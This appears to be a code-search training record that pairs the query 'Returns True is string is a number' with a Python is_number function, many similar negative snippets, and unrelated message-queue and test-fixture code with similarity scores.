logging.error('Unable to deserialize Task proto: %s', e)\n # If the message is gibberish, nacking keeps putting it back, wasting\n # resources for no reason. If the message is fine but there's a parsing\n # bug, nacking makes it possible to process the message normally after\n # fixing the bug. If the expected format of the message ever changes in an\n # incompatible way and a message with the new format is sent before the\n # worker is updated, nacking makes it possible to process the message\n # normally after updating the worker.\n message.nack()\n return\n\n # Find the registration, based on the type of proto stored in task.args.\n _, _, full_name = task.args.type_url.partition('/')\n try:\n registration = self._message_type_registry[full_name]\n except KeyError:\n logging.warning('Unknown type of task: %s', task.args.type_url)\n # If the task has a bogus type, nacking keeps putting it back, wasting\n # resources for no reason. If a new task type is added and those tasks are\n # requested before the worker code is updated, nacking makes it possible\n # to process the tasks after the worker code is updated. If an existing\n # task type is removed from the running worker code before all tasks of\n # that type have been processed, nacking keeps putting it back, wasting\n # resources.\n message.nack()\n return\n\n # Get the args proto.\n args = registration.task_args_class()\n task.args.Unpack(args)\n\n # Convert the task to a loggable string.\n try:\n task_string = self._task_to_string(task)\n except Exception: # pylint: disable=broad-except\n logging.exception(\n 'Unable to convert task of type %s to a string for logging.',\n full_name)\n # If self._task_to_string() fails for a reason unrelated to the task\n # itself, nacking makes it possible to process the task once\n # self._task_to_string() is working again. If something about the task\n # makes self._task_to_string() fail consistently, nacking makes it\n # possible to process the task once the bug in self._task_to_string() is\n # fixed. Additionally, users can catch and ignore exceptions in\n # self._task_to_string() itself if they want to always process tasks\n # regardless of whether it's possible to log the contents of the task.\n message.nack()\n return\n\n # Call the registered callback.\n logging.info('Processing task (message_id=%s):\\n%s', message.message_id,\n task_string)\n try:\n registration.callback(args)\n except Exception: # pylint: disable=broad-except\n logging.exception('Task failed (message_id=%s).', message.message_id)\n # See the comment above about nacking on self._task_to_string() failures\n # for the considerations here.\n message.nack()\n else:\n logging.info('Finished task (message_id=%s).', message.message_id)\n message.ack()", "def worker(self, q, return_dict):\n pid = os.getpid()\n while True:\n qqq = q.get()\n if qqq == 'DONE':\n # print('proc =', os.getpid())\n break\n\n (idx, d) = qqq\n mol_id = d[0]\n smi = d[1]\n # print screening processing in every pout step\n if self.pout != 0:\n if idx % self.pout == self.pout-1:\n print(\"processing: \", idx+1, flush=True)\n result_dict = self.simulation_process(idx, mol_id, smi, pid)\n return_dict[idx] = result_dict", "def handle_message(poll_service, poll_fulfillment_request, django_request):\n try:\n rsp = models.ResultSetPart.objects.get(result_set__pk=poll_fulfillment_request.result_id,\n part_number=poll_fulfillment_request.result_part_number,\n result_set__data_collection__name=poll_fulfillment_request.collection_name)\n\n poll_response = rsp.to_poll_response_11(poll_fulfillment_request.message_id)\n rsp.result_set.last_part_returned = rsp\n rsp.save()\n return poll_response\n except models.ResultSetPart.DoesNotExist:\n raise StatusMessageException(poll_fulfillment_request.message_id,\n ST_NOT_FOUND,\n {SD_ITEM: str(poll_fulfillment_request.result_id)})", "def _handle(self, msg: Message) -> Message:\n\n # skip executor for non-DataRequest\n if msg.envelope.request_type != 'DataRequest':\n if msg.request.command == 'TERMINATE':\n raise RuntimeTerminated()\n self.logger.debug(f'skip executor: not data request')\n return msg\n\n req_id = msg.envelope.request_id\n num_expected_parts = self._get_expected_parts(msg)\n self._data_request_handler.handle(\n msg=msg,\n partial_requests=[m.request for m in self._pending_msgs[req_id]]\n if num_expected_parts > 1\n else None,\n peapod_name=self.name,\n )\n\n return msg", "def test_wait_for_dispatched_inbound(self):\n msg_helper = MessageHelper()\n worker_helper = WorkerHelper()\n d = worker_helper.wait_for_dispatched_inbound(1, 'fooconn')\n self.assertNoResult(d)\n msg = msg_helper.make_inbound('message')\n yield self._add_to_dispatched(\n worker_helper.broker, 'fooconn.inbound', msg, kick=True)\n dispatched = success_result_of(d)\n self.assertEqual(dispatched, [msg])", "async def process(self, msg):\n logger.debug(\"msg:\", json.dumps(msg), caller=self)\n e = msg.get(\"e\")\n if e == \"executionReport\": # Order update.\n if msg[\"s\"] != self._raw_symbol:\n return\n order_no = \"{}_{}\".format(msg[\"i\"], msg[\"c\"])\n if msg[\"X\"] == \"NEW\":\n status = ORDER_STATUS_SUBMITTED\n elif msg[\"X\"] == \"PARTIALLY_FILLED\":\n status = ORDER_STATUS_PARTIAL_FILLED\n elif msg[\"X\"] == \"FILLED\":\n status = ORDER_STATUS_FILLED\n elif msg[\"X\"] == \"CANCELED\":\n status = ORDER_STATUS_CANCELED\n elif msg[\"X\"] == \"REJECTED\":\n status = ORDER_STATUS_FAILED\n elif msg[\"X\"] == \"EXPIRED\":\n status = ORDER_STATUS_FAILED\n else:\n logger.warn(\"unknown status:\", msg, caller=self)\n return\n order = self._orders.get(order_no)\n if not order:\n info = {\n \"platform\": self._platform,\n \"account\": self._account,\n \"strategy\": self._strategy,\n \"order_no\": order_no,\n \"action\": msg[\"S\"],\n \"order_type\": msg[\"o\"],\n \"symbol\": self._symbol,\n \"price\": msg[\"p\"],\n \"quantity\": msg[\"q\"],\n \"ctime\": msg[\"O\"]\n }\n order = Order(**info)\n self._orders[order_no] = order\n order.remain = float(msg[\"q\"]) - float(msg[\"z\"])\n order.status = status\n order.utime = msg[\"T\"]\n if self._order_update_callback:\n SingleTask.run(self._order_update_callback, copy.copy(order))", "def async_handle_message(self, msg: dict) -> None:\n if msg[\"type\"] == \"result\":\n future = self._result_futures.get(msg[\"messageId\"])\n\n if future is None:\n self._logger.warning(\n \"Received result for unknown message: %s\", msg[\"messageId\"]\n )\n return\n\n if msg[\"success\"]:\n future.set_result(msg[\"result\"])\n return\n\n future.set_exception(FailedCommand(msg[\"messageId\"], msg[\"errorCode\"]))\n return\n\n if self.driver is None:\n raise InvalidState(\"Did not receive state as first message\")\n\n if msg[\"type\"] != \"event\":\n # Can't handle\n return\n\n event = Event(type=msg[\"event\"][\"event\"], data=msg[\"event\"])\n self.driver.receive_event(event)", "def process_queued_msg(self):\n try:\n while not self.queue.empty():\n port, tbl = self.queue.get()\n reveived_port = self.switches[port.neighbor_switch_dpid].ports[port.neighbor_port_no]\n self.tbl.update_by_neighbor(reveived_port, port, tbl)\n self.deploy_routing_table()\n except:\n pass", "def execute_message_received(self, message_received):\n pass", "def _worker(self, args):\n pass", "def queue_handler(self):\n work_queue = []\n query_count = 0\n\n while query_count < self.count:\n work_queue.append(self.build_packet(self.record))\n query_count += 1\n\n self.send_queries(work_queue)", "def monitor_queue(queue_id):\n current = dt.datetime.now()\n queue_log = {}\n for sub_id in get_submissions(queue_id=queue_id):\n submission = get_submission_bundle(queue_id, sub_id)\n if submission['status'] == 'RECEIVED':\n queue_log[sub_id] = {'status': 'PENDING'}\n continue\n run_log = submission['run_log']\n if run_log['run_id'] == 'failed':\n queue_log[sub_id] = {'status': 'FAILED'}\n continue\n run_log['wes_id'] = submission['wes_id']\n if run_log['status'] in ['COMPLETE', 'CANCELED', 'EXECUTOR_ERROR']:\n queue_log[sub_id] = run_log\n continue\n wes_instance = WESService(submission['wes_id'])\n run_status = wes_instance.get_run_status(run_log['run_id'])\n\n if run_status['state'] in ['QUEUED', 'INITIALIZING', 'RUNNING']:\n etime = convert_timedelta(\n current - ctime2datetime(run_log['start_time'])\n )\n elif 'elapsed_time' not in run_log:\n etime = 0\n else:\n etime = run_log['elapsed_time']\n\n run_log['status'] = run_status['state']\n run_log['elapsed_time'] = etime\n\n update_submission(queue_id, sub_id, 'run_log', run_log)\n\n if run_log['status'] == 'COMPLETE':\n wf_config = queue_config()[queue_id]\n sub_status = run_log['status']\n if wf_config['target_queue']:\n # store_verification(wf_config['target_queue'],\n # submission['wes_id'])\n sub_status = 'VALIDATED'\n update_submission(queue_id, sub_id, 'status', sub_status)\n\n queue_log[sub_id] = run_log\n\n return queue_log", "def _process_result(self, result):\n if \"errorCode\" in result:\n self._process_error(result)\n else:\n return result", "def test_job_failure(app):\n with worker(app):\n state = wait_for_results(app, length=100, sleep=0.2, maxwait=4)\n\n # Tasks have been delivered and executed.\n assert set(r.return_value for r in all_results(app)) == set(range(100))\n assert len(state.queue.messages) == 0\n\n # Consumer groups behaved properly.\n assert state.queue.info.groups == 1\n assert state.queue.groups[0].pending == 0\n\n # Nothing in the DLQ.\n assert len(state.dead.messages) == 0\n\n # Any scheduled tasks completed and removed.\n assert len(state.schedule) == 0", "def test_get_dispatched(self):\n msg_helper = MessageHelper()\n worker_helper = WorkerHelper()\n dispatched = worker_helper.get_dispatched(\n 'fooconn', 'inbound', TransportUserMessage)\n self.assertEqual(dispatched, [])\n msg = msg_helper.make_inbound('message')\n self._add_to_dispatched(\n worker_helper.broker, 'fooconn.inbound', msg)\n dispatched = worker_helper.get_dispatched(\n 'fooconn', 'inbound', TransportUserMessage)\n self.assertEqual(dispatched, [msg])", "def work(self):\n while True:\n message = self.get()\n self.handle(message)", "def test_dispatch_status(self):\n msg_helper = MessageHelper()\n worker_helper = WorkerHelper()\n broker = self.setup_broker(worker_helper)\n\n self.assertEqual(broker.get_messages('vumi', 'fooconn.status'), [])\n\n msg = msg_helper.make_status(\n status='down',\n component='foo',\n type='bar',\n message='baz')\n\n yield worker_helper.dispatch_status(msg, 'fooconn')\n\n self.assertEqual(\n broker.get_messages('vumi', 'fooconn.status'), [msg])", "def handle_messages(self):\n\n #Get the time at which the code started running\n current_time = datetime.datetime.now()\n\n #get all messages between now and the time where a message was last received\n messages = self.client.messages.list(\n date_sent_before = datetime.datetime.now()+ datetime.timedelta(hours = TIMEDIFFERENCE),\n date_sent_after = self.last_message_timing + datetime.timedelta(hours = TIMEDIFFERENCE)\n )\n\n #Iterate through all the new messages\n for record in messages:\n #If it is not from the Twilio Client\n if record.from_ != 'whatsapp:+14155238886':\n #Then update the timing of the last message to the current time\n self.last_message_timing = current_time\n #If the message sent is the '?' that seeks to get the number\n #of people in the queue\n if record.body == '?':\n #Get the data about people from firebase\n people_data = self.firebase.get_data('people_count')\n #Get the number of people queueing\n no_of_people = people_data['people_count']\n #Create a message from the API to tell the person\n #asking the number of people in the queue\n message = self.client.messages.create(\n body='The number of the people in the queue is {}'.format(no_of_people),\n from_='whatsapp:{sender_number}'.format(**self.config),\n to=record.from_\n )", "def handle_ACS_worklist_info_response(self,message,conn):\n response=ResponseClientHandle.switch_msg_stream_type_str2dict(message)\n \n msg_type=response.get(event.KEY_MESSAGE)\n msg_group = int(msg_type) & 0xFF00\n \n if (msg_group == event.EVENT_WORKLIST_GROUP):\n \n # check worklist reseve response\n if(msg_type == event.EV_WORKLIST_RESERVE_RSP):\n log.debug_info(\"ACS server's response worklist reserve suc\")\n\n # call worklist execute start request \n DUTqueue.ResponseWLexecHandle.handle_WLexec_start_request(self.msg,response,None)\n \n elif(msg_type == event.EV_WORKLIST_RESERVE_FAIL):\n log.debug_info(\"ACS server's response worklist reserve fail\")\n\n ResponseClientHandle.handle_send_response(response,conn)\n \n # check worklist start response \n elif(msg_type == event.EV_WORKLIST_EXEC_START_RSP):\n log.debug_info(\"ACS server's response worklist execute start suc\")\n \n # call worklist execute request\n DUTqueue.ResponseWLexecHandle.handle_WLexec_request(self.dut_obj_handle,self.msg,response,conn)\n\n elif(msg_type == event.EV_WORKLIST_EXEC_START_FAIL):\n log.debug_info(\"ACS server's response worklist execute start fail\")\n \n ResponseClientHandle.handle_send_response(response,conn)\n\n # check worklist finish response \n elif(msg_type == event.EV_WORKLIST_EXEC_FINISH_RSP):\n log.debug_info(\"ACS server's response worklist execute finish suc\")\n\n elif(msg_type == event.EV_WORKLIST_EXEC_FINISH_FAIL):\n log.debug_info(\"ACS server's response worklist execute finish fail\")\n \n # check worklist build/bind/download response\n else:\n ResponseClientHandle.handle_send_response(response,conn)\n \n else:\n err_info = \"Unsupport msg event group:%d\" % msg_group\n log.debug_info(err_info)\n ResponseClientHandle.handle_except(self.msg,self.conn,err_info)", "def _recv(self):\n\n self.had_recv_error = []\n self.recv_exc = {}\n results = []\n import sys;\n #only listen on workers involved in calculation.\n for worker in self.workers[:self.Nsent]:\n if worker in self.had_send_error:\n results.append(None)\n else:\n try:\n sys.stdout.flush()\n results.append(worker.recv())\n except sync_cluster.RemoteError:\n import sys\n err = sys.exc_info()[1]\n # Force the err msg (err[1]) to be a string.\n # This dimishes info content, but makes sure\n # that the sames errors are hashed correctly\n # in the dictionary. (does it?)\n err_type,err_msg, err_traceback = err\n err = err_type,str(err_msg), err_traceback\n self.had_recv_error.append(worker)\n try: self.recv_exc[err].append(worker.id)\n except: self.recv_exc[err] = [worker.id]\n results.append(None)\n except sync_cluster.RemoteCrashError:\n # Gotta be more intelligent here...\n msg = 'Error! Remote worker %d appears to have crashed.' \\\n % worker.id\n raise sync_cluster.RemoteCrashError,msg\n # else handle other errors\n #print\n return tuple(results)" ]
[ "0.6850718", "0.6538829", "0.65200484", "0.64860433", "0.6379262", "0.63759804", "0.62607986", "0.6202013", "0.6202013", "0.61881113", "0.61721927", "0.6146824", "0.61398584", "0.6130029", "0.6085379", "0.60829306", "0.6052195", "0.60503155", "0.6036185", "0.5957413", "0.59528136", "0.5928204", "0.59262717", "0.5890043", "0.588151", "0.5857312", "0.58555824", "0.58444524", "0.5837317", "0.5830393", "0.5797025", "0.5778435", "0.575851", "0.575363", "0.5749782", "0.5748115", "0.57173455", "0.57141376", "0.5708827", "0.5669862", "0.5669805", "0.5668781", "0.5632324", "0.5631926", "0.56312424", "0.5617743", "0.5615145", "0.5613224", "0.56105256", "0.55955476", "0.5592492", "0.5574398", "0.5574095", "0.5564366", "0.5562877", "0.55519956", "0.554186", "0.5541317", "0.5540563", "0.55270916", "0.55153483", "0.54992175", "0.54960084", "0.54879326", "0.5484235", "0.5483091", "0.54687494", "0.5467488", "0.5467412", "0.54646784", "0.5459038", "0.5457132", "0.5442117", "0.5432905", "0.5428562", "0.5427398", "0.5424205", "0.5424205", "0.5408864", "0.5376861", "0.5370635", "0.5368436", "0.53636676", "0.5363277", "0.5356413", "0.5346465", "0.5345586", "0.53444415", "0.5340364", "0.53383553", "0.53353995", "0.5333702", "0.5324205", "0.5320672", "0.531562", "0.53141445", "0.5312734", "0.5307528", "0.5304341", "0.53026825" ]
0.6439669
4
Returns True is string is a number.
def is_number(s): try: float(s) return True except ValueError: return False
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def is_number(string):\r\n try:\r\n float(string)\r\n return True\r\n except ValueError: return False", "def is_number(string):\n try:\n float(string)\n return True\n except ValueError:\n return False", "def is_number(s):\r\n try:\r\n int(s)\r\n return True\r\n except ValueError:\r\n return False", "def is_number(s):\n try:\n int(s)\n return True\n except ValueError:\n return False", "def is_number(s):\r\n try:\r\n float(s)\r\n return True\r\n except ValueError:\r\n return False", "def is_number(str):\n\n # Local constants\n\n # Local variabes\n\n #****** start is_number() ******#\n\n try:\n float(str)\n return True\n except ValueError:\n return False", "def is_number(str):\n try:\n float(str)\n return True\n except ValueError as e:\n print(e)\n try:\n unicodedata.numeric(str)\n return True\n except (TypeError, ValueError) as e:\n print(e)\n return False", "def is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n return False", "def is_valid_numeric(inString):\r\n return is_int(inString) or is_float(inString)", "def is_number(s: Any) -> bool:\n try:\n int(s)\n return True\n except ValueError:\n pass\n\n try:\n float(s)\n return True\n except ValueError:\n pass\n\n return False", "def _is_number(s) -> bool:\n try:\n float(s)\n except ValueError:\n return False\n else:\n return True", "def IsNumber(s):\n try:\n v = float(s)\n return True\n except ValueError:\n return False", "def isNumber(s):\n\ttry:\n\t\tfloat(s)\n\t\treturn True\n\texcept ValueError:\n\t\treturn False", "def is_number(s: Union[str, int, float]):\n if isinstance(s, str) and s.lower() == \"nan\":\n return True\n try:\n float(s)\n return True\n except ValueError:\n return False", "def isNumber(s):\n try:\n float(s)\n return True\n except ValueError:\n return False", "def is_number(self,s):\n try:\n float(s.replace(\" \", \"\"))\n return True\n except ValueError:\n return False", "def isNumber(self, s):\n try:\n tmp = float(s)\n return True\n except:\n return False", "def is_some_number(mystring):\n # print(Bcolors.cyan + re.findall(r\".*\\\\(.*)\", inspect.stack()[0][1])[0] + \" --- \"\n # + inspect.stack()[0][3] + \"()\" + Bcolors.ENDC)\n mystring = str(mystring)\n mystring = re.sub(\",\", \".\", mystring)\n try:\n if float(mystring):\n return True\n except ValueError:\n return False", "def is_number_repl_isnumeric(s):\n return s.replace('.', '', 1).isnumeric()", "def __has_numbers(self, input_string):\n return bool(re.search(r'\\d', input_string))", "def _isnumber(string):\n if not _isconvertible(float, string):\n return False\n elif isinstance(string, (str, bytes)) and (\n math.isinf(float(string)) or math.isnan(float(string))\n ):\n return string.lower() in [\"inf\", \"-inf\", \"nan\"]\n return True", "def isnumeric(number):\n try:\n float(number)\n return True\n except (TypeError, ValueError):\n return False", "def is_numeric(s):\n \n if s == False or s == None or s == \"\" or s == True:\n return False\n \n try:\n float(s)\n return True\n except (ValueError, TypeError):\n return False", "def checkifnumber(self, test_string):\r\n try:\r\n float(test_string)\r\n return(True)\r\n except ValueError:\r\n return(False)", "def is_number(value):\n try:\n int(value)\n return True\n except (ValueError, TypeError):\n return False", "def _is_number(value):\n try:\n float(value)\n return True\n except (TypeError, ValueError):\n return False", "def is_numeric(val):\n if \\\n isinstance(val, int) or \\\n isinstance(val, float):\n return True\n elif \\\n isinstance(val, str) and \\\n val.isdigit():\n return True\n else:\n return False", "def isnumber(n):\r\n N = str(n)\r\n if N.isdigit():\r\n return True\r\n else:\r\n return False", "def isnumber(x):\n try:\n float(x)\n return True\n except ValueError:\n return False", "def is_number(c):\n return '0' <= c <= '9'", "def IsNumeric(text):\n try:\n _ = float(text)\n except ValueError:\n return 0\n else:\n return 1", "def is_number(num):\n try:\n float(num)\n return True\n except ValueError:\n return False", "def is_numeric(value):\n return any([\n type(value) is str and value.isnumeric(),\n hasattr(value, 'is_integer') and value.is_integer(),\n type(value) is int,\n ])", "def isNumber(string):\r\n for char in string:\r\n charNum = ord(char)\r\n if (charNum < 48 or charNum > 57):\r\n return False\r\n return True", "def is_num(var):\n try:\n int(var)\n return True\n except ValueError:\n return False", "def __is_int(self,string):\r\n try: \r\n int(string)\r\n return True\r\n except ValueError:\r\n return False", "def is_number(value):\n try:\n float(value)\n return True\n except ValueError:\n return False", "def is_int(string:str) -> bool:\n try:\n int(string)\n return True\n except:\n return False", "def isnum(value):\n\n try:\n return bool(isinstance(value, (float, int)))\n except RuntimeError:\n return False", "def is_integer(self, string):\n try:\n return int(string)\n except:\n return False", "def is_number(n):\n\ttry:\n\t\tfloat(n)\n\t\treturn True\n\texcept ValueError:\n\t\treturn False", "def is_number_regex(s):\n if re_match('^\\d+?\\.\\d+?$', s) is None:\n return s.isdigit()\n return True", "def is_number_regex(s):\n if re.match(\"^\\d+?\\.\\d+?$\", s) is None:\n return s.isdigit()\n return True", "def is_number_regex(s):\n if re.match(\"^\\d+?\\.\\d+?$\", s) is None:\n return s.isdigit()\n return True", "def is_number(number):\n try:\n float(number)\n return True\n except ValueError:\n return False", "def isnum(self, x):\n\n return x in '1234567890.-'", "def is_int(string):\n try:\n int(string)\n return True\n except ValueError:\n return False", "def is_num(n):\n return '{} is a number'.format(n)", "def is_number_tryexcept(s):\n try:\n float(s)\n return True\n except ValueError:\n return False", "def is_number(number):\n if type(number) == type(1) or type(number) == type(0.1) or type(number) == type('') or type(u''):\n try:\n float(number)\n return True\n except ValueError:\n return False\n except TypeError:\n return False\n else:\n return False", "def isit_float(s):\r\n try:\r\n int(s)\r\n return False\r\n except ValueError:\r\n try:\r\n float(s)\r\n return True\r\n except ValueError:\r\n return False", "def is_number(self,val):\n try:\n float(val)\n return True\n except ValueError:\n return False", "def is_number(x):\n if isinstance(x, (int, float)):\n return True\n else:\n return False", "def is_numeric(value):\n return isinstance(value, int) or isinstance(value, float)", "def could_be_number(val):\n if val == None:\n return False\n\n if isinstance(val, (float, int, long)):\n return True\n\n # allow coercion from str\n if isinstance(val, (str, unicode)):\n try:\n n = float(val)\n if not isinstance(n, float):\n raise ValueError\n else:\n return True\n except:\n return False\n\n #otherwise\n return False", "def is_number(self) -> bool:\n return False", "def isNumber(word):\n try:\n int(word)\n return True\n except ValueError:\n return False", "def is_number_repl_isdigit(s):\n return s.replace('.', '', 1).isdigit()", "def is_number_tryexcept(s):\n try:\n float(s)\n return True\n except ValueError:\n return False", "def is_number(value):\n\n return isinstance(value, (int, long, float))", "def is_number(text):\n return text.lower() in AVRO_NUMBERS", "def isNumber(number):\n try:\n # Try to cast the string\n int(number)\n # The cast was successful\n return True\n # The cast was unsuccessful, the string is not a number\n except ValueError as err:\n # Write the exception in logging\n logging.exception(str(err))\n return False", "def is_integer(s: Union[str, int, float]):\n try:\n float(s)\n except ValueError:\n return False\n else:\n return float(s).is_integer() and not np.isnan(float(s))", "def isNumber(st):\n\treturn st.replace('.','',1).isdigit()", "def isNumeric(string, needHexPrefix):\n return (True)", "def ISNUMBER(value):\n return isinstance(value, numbers.Number)", "def is_numeric(number):\n\n if isinstance(number, bool):\n return False\n elif isinstance(number, int) or isinstance(number, float):\n return True\n else:\n return False", "def test_is_number(self):\n \n self.assertEqual(self.var.is_number(None), False)\n self.assertEqual(self.var.is_number(\"5\"), True)\n self.assertEqual(self.var.is_number(\"a\"), False)", "def has_number(any_string):\n return any(char.isdigit() for char in any_string)", "def is_number(n):\n return isinstance(n, (int, float))", "def is_digit_regex(s: str) -> bool:\n if re.match(\"^\\d+?\\.\\d+?$\", s) is None:\n return s.isdigit()\n return True", "def isnumeric(self):\n return isnumeric(self)", "def isInt(s):\n try:\n int(s)\n return True\n except ValueError:\n return False", "def _check_message_is_number(message):\n try:\n float(message)\n return True\n except ValueError:\n return False", "def isint(str):\n\n try:\n int(str)\n return True\t\t\t#Returns true if the string is an integer\n except (ValueError, TypeError):\n return False\t\t\t#Returns false otherwise", "def is_number_parse_float(s):\n try:\n float(s)\n return True\n except ValueError:\n return False", "def is_numeric(self) -> bool:\n return False", "def isfloat(string:str) -> bool:\n try:\n float(string)\n return True\n except ValueError:\n return False", "def isfloat(string):\n try:\n float(string)\n return True\n except ValueError:\n return False", "def isint(s):\n try:\n x = int(s)\n return True\n except:\n return False", "def is_float(string: str) -> bool:\n try:\n float(string)\n return True\n except ValueError:\n return False", "def is_float(string):\n try:\n float(string)\n return True\n except ValueError:\n return False", "def _isnumber_with_thousands_separator(string):\n try:\n string = string.decode()\n except (UnicodeDecodeError, AttributeError):\n pass\n\n return bool(re.match(_float_with_thousands_separators, string))", "def is_float(string):\n try:\n float(string)\n return True\n except ValueError:\n return False", "def _is_number(self, symbol):\n if symbol.type == self.scanner.NUMBER:\n return True\n else:\n return False", "def is_number(G):\n return True", "def hasNumbers(inputString):\n return any(char.isdigit() for char in inputString)", "def isnumeric(a):\n if not _is_unicode(a):\n raise TypeError(\"isnumeric is only available for Unicode strings and arrays\")\n return _vec_string(a, bool_, 'isnumeric')", "def is_float(string):\n try:\n return float(string)\n except ValueError:\n return False", "def is_numeric(space, w_obj):\n if w_obj.tp in [space.tp_float, space.tp_int]:\n return space.w_True\n if w_obj.tp == space.tp_str:\n return space.newbool(w_obj.is_really_valid_number(space))\n return space.w_False", "def is_number_char(c: str) -> bool:\n return c.isdigit() or c == \".\"", "def represents_int(s):\n try:\n int(s)\n return True\n except ValueError:\n return False", "def is_number(value):\n try:\n float(value.replace(',', ''))\n except ValueError:\n return False\n return True", "def is_valid_decimal(string: str) -> bool:\n try:\n float(string)\n except ValueError:\n return False\n else:\n return True", "def isInt(string):\n try: int(string)\n except ValueError: return 0\n else: return 1", "def is_number(self, value):\n if isinstance(value, (int, float, long, complex)): # noqa\n return True\n return False", "def slug_is_numerical(slug):\r\n try:\r\n float(slug)\r\n except ValueError:\r\n return False\r\n\r\n return True", "def isNumber(txt):\r\n if not isinstance(txt, str) or len(txt)==0:\r\n return \"error: isNumber\"\r\n # --- YOU CODE STARTS HERE\r\n else: \r\n try: \r\n m = float(txt)\r\n return True\r\n except ValueError: \r\n return False" ]
[ "0.8850884", "0.8807396", "0.87623763", "0.87143797", "0.86495125", "0.86369324", "0.8611852", "0.8602863", "0.85868895", "0.8556723", "0.8540039", "0.846474", "0.83899784", "0.83504224", "0.82912153", "0.8217023", "0.81620115", "0.81181717", "0.8040893", "0.8037833", "0.8027394", "0.80194235", "0.7995083", "0.799109", "0.7920119", "0.78781044", "0.7837806", "0.7820823", "0.78159165", "0.7813508", "0.78091305", "0.7798515", "0.7791748", "0.7769569", "0.77473253", "0.7735177", "0.77194065", "0.770347", "0.7695527", "0.7686505", "0.7672379", "0.76521534", "0.7648834", "0.7648834", "0.76311475", "0.7630661", "0.7627648", "0.7626045", "0.7618389", "0.7613843", "0.7612315", "0.7611695", "0.7607591", "0.75929785", "0.7577857", "0.7571311", "0.75650424", "0.7544545", "0.75407887", "0.7534774", "0.7534169", "0.75090873", "0.7489672", "0.7479877", "0.74765104", "0.74717206", "0.7460645", "0.74596334", "0.7438914", "0.7429114", "0.7427089", "0.7399662", "0.7392259", "0.7384482", "0.7383222", "0.7361936", "0.7343039", "0.7326502", "0.731788", "0.73169464", "0.7305423", "0.73012096", "0.7282405", "0.72775877", "0.72748905", "0.7268661", "0.72534895", "0.72485024", "0.72460884", "0.72455066", "0.72232634", "0.7219982", "0.7207299", "0.71819943", "0.71562195", "0.71551806", "0.7149046", "0.71479934" ]
0.8597067
10
For some reason, app.dependency_overrides does not accept pytest fixtures as overrider, so this function is needed although it is exactlythe same as db
def testing_get_db() -> Generator: db = TestSessionLocal() try: yield db finally: db.close()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def fixtures():", "def fixture_example_data():\n import_example_data()", "def _fixture_setup(self):\n pass", "def db_python_only():\n return os.path.join(_here, 'fixtures/databases/db-python-only/database')", "def load_initial_fixtures_func(app_name):\n return partial(_load_initial_fixtures_impl, app_name)", "def setUpFixture(self):\n pass", "def setUpBeforeMigration(self, apps):\n pass", "def add_fixtures(ctest):\n\n def test_setup(funct):\n \"\"\"Test setUp decorator to add fixture reloading.\"\"\"\n\n def decorated_setup():\n \"\"\"Decorated test setup.\"\"\"\n testdb.reload_db()\n funct()\n return decorated_setup\n\n for test in ctest._tests:\n test.setUp = test_setup(test.setUp)", "def setup_before_migration(self, apps):", "def setUpClass(cls):\n super(ExistingDataSourceTest, cls).setUpClass()\n django.setup()", "def setUpClass(cls):\n super(ExistingDataTest, cls).setUpClass()\n django.setup()", "def _pre_setup(self):\n apps.clear_cache()\n call_command('migrate', interactive=False, verbosity=0)\n call_command('loaddata', 'initial_data', verbosity=0)\n super(DatatableViewTestCase, self)._pre_setup()", "def test_setup(funct):\n\n def decorated_setup():\n \"\"\"Decorated test setup.\"\"\"\n testdb.reload_db()\n funct()\n return decorated_setup", "def db_available(test):\n from bob.io.base.test_utils import datafile\n from nose.plugins.skip import SkipTest\n import functools\n\n @functools.wraps(test)\n def wrapper(*args, **kwargs):\n dbfile = datafile(\"db.sql3\", __name__, None)\n if os.path.exists(dbfile):\n return test(*args, **kwargs)\n else:\n raise SkipTest(\n \"The database file '%s' is not available; did you forget to run 'bob_dbmanage.py %s create' ?\" % (\n dbfile, 'avspoof'))\n\n return wrapper", "def patch_mongo(monkeypatch):\n mock_db = mongomock.MongoClient().todo_database\n\n def fake_get_db():\n return mock_db\n\n monkeypatch.setattr(main.data_access, \"get_db\", fake_get_db)", "def setUp_extra(self):\n pass", "def post_migrations(self):", "def requires_database(func):\n def decorated(*args, **kwargs):\n if template_conn.closed:\n raise SkipTest(\"Database connection closed\")\n\n original_db_uri = app.config['SQLALCHEMY_DATABASE_URI']\n app.config['SQLALCHEMY_DATABASE_URI'] = db_uri_for('afcon_test')\n\n try:\n reset_db()\n except ProgrammingError as e:\n raise SkipTest(\"Database could not be created\")\n\n # Avoid circular reference\n from afcon.manager import manager\n manager.handle(sys.argv[0], ['db', 'upgrade'])\n\n rv = func(*args, **kwargs)\n\n # Reset DB URI\n app.config['SQLALCHEMY_DATABASE_URI'] = original_db_uri\n\n return rv\n\n return decorated", "def initialize_test_db(self):\n # Create a test database and sync it with models.py\n # Handle a second test database for selenium use. Postgres uses\n # transactions which interfere with the Django server thread.\n settings.TEST_DATABASE_NAME = self.db_name\n connection.creation.create_test_db(verbosity=self.verbosity,\n autoclobber=True)\n # Hook for doing any extra initialization\n self.extra_init()\n # Load fixture data.\n call_command('loaddata', *self.fixtures, verbosity=self.verbosity)\n # Sync data and close connection\n connection.close()\n # If sqlite3 or Postgres is used, create a backup database to speed up\n # fixture reloading.\n if settings.DATABASE_ENGINE == 'postgresql_psycopg2':\n # connection.creation is used to overcome transaction management,\n # allowing to execute DROP and CREATE db commands.\n cursor = connection.cursor()\n connection.creation.set_autocommit()\n cursor.execute(\"DROP DATABASE IF EXISTS %s_backup\" % self.db_name)\n cursor.execute(\"CREATE DATABASE %s_backup WITH TEMPLATE %s\" % (\n self.db_name, self.db_name))\n if settings.DATABASE_ENGINE == 'sqlite3':\n self.db_path = os.path.join(PROJECT_PATH, settings.DATABASE_NAME)\n self.db_backup_path = '%s_backup' % self.db_path\n if self.db_path[-3:] == '.db':\n self.db_backup_path = '%s_backup.db' % self.db_path[:-3]\n shutil.copyfile(self.db_path, self.db_backup_path)\n # Restore the database names as create_test_db changed it.\n settings.TEST_DATABASE_NAME = self.test_database_name\n settings.DATABASE_NAME = self.database_name", "def setUp(self):\n self.app = load_app(self.application_under_test)\n\n try:\n teardown_db()\n except Exception as e:\n print('-> err ({})'.format(e.__str__()))\n\n setup_app(section_name=self.application_under_test)\n setup_db()\n\n fixtures_loader = FixturesLoader([BaseFixture]) # BaseFixture is already loaded in bootstrap\n fixtures_loader.loads(self.fixtures)", "def setUp(self):\n self.app = Flask(__name__)\n db.init_app(self.app)\n with self.app.app_context():\n db.create_all()\n 